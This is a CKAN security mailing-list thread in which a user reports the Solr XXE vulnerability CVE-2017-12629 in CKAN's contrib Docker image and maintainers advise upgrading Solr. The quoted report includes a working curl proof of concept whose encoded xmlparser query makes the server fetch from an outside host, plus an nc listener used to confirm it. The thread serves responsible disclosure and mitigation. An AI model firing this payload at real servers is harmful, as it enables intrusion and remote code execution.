[CKAN-Security] solr 6.2

Adrià Mercader adria.mercader at okfn.org
Thu Feb 22 09:28:45 UTC 2018

Apologies, I misread the available versions and in fact the upgrade is from
6.2 to 6.6.2.

In any case and given the use CKAN makes of Solr I don't see any potential
issues with the upgrade after going through the changes list:


Hope this helps,


On 22 February 2018 at 09:55, Adrià Mercader <adria.mercader at okfn.org>

> Hi JD,
> Many thanks for the report. We have received reports from this issue and
> are preparing patches and/or updates to help mitigate it. If you are using
> the Docker image included in contrib the easiest fix is just to use the
> solr:6.2.2 image as this one includes the fix for the issue:
> https://lucene.apache.org/solr/news.html#18-october-
> 2017-apache-solrtm-662-available
> It only includes this bug fix so it should not cause any compatibility
> issues.
> We will update the image in contrib asap, and let you know of any
> mitigation steps that we take.
> Best regards,
> Adrià
> On 21 February 2018 at 08:53, JD Bothma <jd at openup.org.za> wrote:
>> Hi
>> We've contracted someone to pen-test data.vulekamali.gov.za who found
>> the following critical vulnerability in CKAN 6.2 as used in the Dockerfile
>> under contrib
>> https://www.cvedetails.com/cve/CVE-2017-12629/
>> https://issues.apache.org/jira/browse/SOLR-11477?attachmentOrder=asc
>> We're launching our portal right now so not comfortable upgrading solr
>> just yet, but remapping the xmlparser name to the edismax class has
>> mitigated it for us for now. See https://lucene.apache.org/solr
>> /news.html#12-october-2017-please-secure-your-apache-
>> solr-servers-since-a-zero-day-exploit-has-been-reported-on-
>> a-public-mailing-list
>> I confirmed the vulnerability with the following curl request against a
>> locally-running ckan instance:
>> curl -v localhost/api/3/action/package_search?q=%7B%21xmlparser%20v%
>> 3D%27%3C%21DOCTYPE%20a%20SYSTEM%20%22http%3A%2F%2F172.18.0.1%3A8888%
>> 2FDEADBEEF%22%3E%3Ca%3E%3C%2Fa%3E%27%7D
>> On the IP port 8888 I was running nc -l -p 8888 - when running
>> the request against ckan, I saw a GET request in nc. You can also verify
>> the vulnerability by looking for "Connection Refused" in the error response
>> which shows the server tried to request the DOCTYPE you told it to, and
>> would have executed malicious code you would have served.
>> Best
>> JD
>> _______________________________________________
>> CKAN security
>> https://lists.okfn.org/mailman/listinfo/security
>> https://lists.okfn.org/mailman/options/security/adria.mercader%40okfn.org
>> Repo: https://github.com/ckan/ckan-security
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.okfn.org/mailman/private/security/attachments/20180222/78419e30/attachment-0001.html>

More information about the Security mailing list